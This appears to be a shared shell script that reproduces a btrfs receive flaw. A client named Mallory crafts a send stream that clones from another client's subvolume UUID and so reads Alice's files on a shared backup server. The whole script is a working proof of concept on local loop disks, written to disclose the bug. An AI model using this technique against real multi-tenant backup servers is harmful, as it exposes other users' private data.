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Created September 6, 2016 16:56
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Btrfs receive test
#!/bin/sh -x
# Reproduce btrfs receive exposure of files outside path
# Background: assume two clients Alice and Mallory are using btrfs send to
# send snapshots to a single server for backup. Each client has their
# own directory on the server and the server always receives into a path
# starting at their own directory. This script demostrates that Mallory can
# get access to Alice's files if he knows Alice's subvolume UUID.
# Create Alice's source subvolume
dd if=/dev/zero of=source.disk bs=1M count=100
mkfs.btrfs source.disk
mkdir source
mount -o loop source.disk source
btrfs subv create source/testvol
btrfs subv list -u source
dd if=/dev/urandom of=source/testvol/testfile bs=1M count=10
btrfs subv snap -r source/testvol source/testvol.snap
btrfs send -f Alice.send source/testvol.snap
# Alice's subvolume file is a bit over 10M...
ls -lh Alice.send
# Now create Mallory's hand-crafted file
# To make the script work we create this using Alice's source
# but in reality Mallory could create this file easiy by hand
# as long as they know (or can guess) the UUID
btrfs subv snap source/testvol source/Mallory
btrfs subv snap -r source/Mallory source/Mallory.snap
btrfs send -f Mallory.send -c source/testvol.snap source/Mallory.snap
ls -l Mallory.send
umount source
# Set up backup server disk
dd if=/dev/zero of=server.disk bs=1M count=100
mkfs.btrfs server.disk
mkdir server
mount -o loop server.disk server
# Receive Alice's backup
mkdir server/Alice
btrfs receive -vv $CHROOT -f Alice.send server/Alice
ls -lR server/Alice
cksum server/Alice/testvol.snap/testfile
# Receive Mallory's backup
mkdir server/Mallory
btrfs receive -vv $CHROOT -f Mallory.send server/Mallory
ls -lR server/Mallory
cksum server/Mallory/Mallory.snap/testfile
umount server
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